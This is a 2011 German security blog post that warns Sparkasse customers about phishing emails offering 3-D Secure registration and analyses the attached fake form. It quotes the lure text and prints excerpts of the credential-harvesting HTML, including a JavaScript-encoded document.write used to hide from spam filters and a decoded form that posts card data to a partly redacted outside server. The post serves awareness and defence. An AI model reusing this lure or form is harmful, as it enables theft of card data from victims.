Web-Sicherheit

Juni 30, 2011

Achtung vor MasterCard SecureCode und Verified by Visa!

Filed under: Allgemein — sebastiankuebeck @ 15:35
Tags: , , , , ,

Zurzeit sind besonders „kreativ“ gestaltete Phishing-Mails im Umlauf, die den Empfänger auffordern, sich für MasterCard SecureCode oder Verified by Visa (Der Sammelbegriff für diese  Technologien ist 3-D Secure) zu registrieren:

Mehr Sicherheit beim Internet-Shopping

MasterCardR SecureCode? / Verified by Visa

Einkaufe im Internet mit Ihrer MasterCard / Visa Karte ab sofort
noch sicherer. Nutzen Sie das neue, innovative
Sicherheitsverfahren fur Ihre Sparkassen-Kreditkarte.

Ihre Vorteile

* Sicheres Bezahlen fur Ihren Einkauf im Internet
* Einfache Anwendung
* Weltweites Bezahlverfahren
* Sofort einsatzbereit - ohne Software-Installation auf Ihrem PC

Das bietet Ihnen MasterCardR SecureCode? / Verified by Visa

MasterCardR SecureCode? und Verified by Visa bietet Ihnen einen
zusatzlichen Schutz fur Ihre Bezahlungen im Internet. Ihre
Kreditkartendaten werden vor unberechtigter Verwendung geschutzt,
wenn Sie bei den teilnehmenden Handlern "online shoppen".

In Deutschland sind zum Beispiel schon Otto, Dress-for-less,
parship, Tchibo und viele weitere Handler dabei.

Bitte laden Sie den Anhang und fullen Sie das Formular Passwort
vergessen

Wie im Text richtig steht, verwenden immer mehr Seiten 3D-Secure, allerdings würde keine Bank auf der Welt ihre Kunden auffordern, Kreditkartendaten in einem E-Mail-Formular einzugeben – schon gar nicht mit einer E-Mail, die offensichtlich nicht von einer Person mit Deutsch als Muttersprache verfasst ist! Sollten Sie E-Mails dieser Art bekommen und nicht sicher sein, ob sie legitim sind, oder nicht, kontaktieren Sie bitte Ihre Bank telefonisch. Besser einmal zuviel nachfragen als sich Schwierigkeiten einhandeln! Was passiert, wenn Ihre Kreditkartendaten missbraucht werden, habe ich im Zusammenhang mit dem Vorfall bei Sony beschrieben.

Nun zu den technischen Feinheiten: Das Formular ist ein Anhang und dieser tarnt sich geschickt vor Spam-Filtern, indem er die Zieladresse des Formulars verschleiert:

<script type="text/javascript">document.write('\u003C\u0048\...'); </script>
<TR>
    <TD>Kreditkartennummer:</TD>
    <TD><INPUT maxLength="16" size="15" name="card"></TD></TR>
  <TR>
</TD></TR>
  ...
  <TR>
    <TD colSpan="2" align="middle">www.sparkasse.de/sicherheit/sicherheit/kreditkartenzahlung.html</TD>
  </TR>
</TBODY>
</TABLE>
</FORM>
<script language = "javascript">
  function submitIt(form) {
    if (form.card.value == "") {
     ...
	 return false;
    }else if (form.mm.value == "") {
	 ...
    }else{
      return true;
    }
  }
</script>
</BODY>
</HTML>

Der Verweis auf die http://www.sparkasse.de ist kein gültiger Link, er soll lediglich das Vertrauen der Opfer stärken.

So ist das natürlich kein gültiges HTML, allerdings fügt die Anweisung document.write zusätzlichen Code am Anfang des Formulars ein. Dieser Code ist wiederum JavaScript-codiert, um ungehindert an den Spamfiltern vorbeizukommen. Dekodiert sieht die Geschichte wie folgt aus:

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META http-equiv=Pragma content=no-cache>
<LINK rel="stylesheet" href="http://??????????????.com/css/iepc.css" type="text/css">
</HEAD>
<BODY>
<center><BR /><BR />
<IMG border="0" alt="" src="http://???????????????.net/tmp/Sparkassen_BCS.gif"><br /><br />
<IMG border="0" alt="" src="http://???????????????.net/tmp/vpas_logo.gif" width="79" height="46">    
<IMG border="0" alt="" src="http://???????????????net/tmp/mpas_logo.gif" width="79" height="46"></A></center>
<FORM id="FORM1" onsubmit="return submitIt(this)" method="post" name="FORM1"
  action="http://?????????????.net/tmp/pbs.php">
<TABLE border="0" align="center">
<TBODY>

Das Formular ruft also die Funktion submitIt(this) auf, die die Eingabe überprüft (als verwöhnter Gauner will man natürlich keine unvollständigen Daten…) und das Opfer auf eine türkische Seite verweist. Dort werden die Daten dann vom Verfasser dieser E-Mail entgegengenommen und illegalen Zwecken zugeführt. Obwohl der Betrug leicht zu durchschauen ist, stehen die Chancen gar nicht so schlecht, dass zumindest ein paar Prozent der Empfänger darauf hereinfallen. Wenn man bedenkt, dass diese Mails oft an Millionen von Adressaten geschickt werden, kann da einiges zusammenkommen.

Update 01.07.2011: Offizielle Warnung auf sparkasse.de:

Geben Sie niemals Ihre PIN und TAN heraus! Auch wenn Sie von scheinbar seriöser Stelle dazu aufgefordert werden. Die Sparkassen werden Sie weder per E-Mail noch persönlich am Telefon auffordern, Ihre Zugangsdaten zum Online-Banking preiszugeben oder aus einer E-Mail heraus Webseiten zu öffnen, um dort Kontodaten oder Kreditkarten-Nummern einzugeben.

Wenn Sie eine E-Mail mit entsprechendem Inhalt erhalten, ignorieren Sie diese Aufforderung und leiten Sie die E-Mail an Ihre Sparkasse oder an warnung@sparkasse.de weiter, damit die von den Betrügern genutzten Server identifiziert werden können. Wenn Sie bereits Daten eingegeben haben, setzen Sie sich umgehend mit Ihrer Sparkasse in Verbindung, um Ihre Kreditkarte sperren zu lassen.

Schreibe einen Kommentar »

Es gibt noch keine Kommentare.

RSS feed for comments on this post. TrackBack URI

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden / Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s

Bloggen auf WordPress.com.

%d Bloggern gefällt das: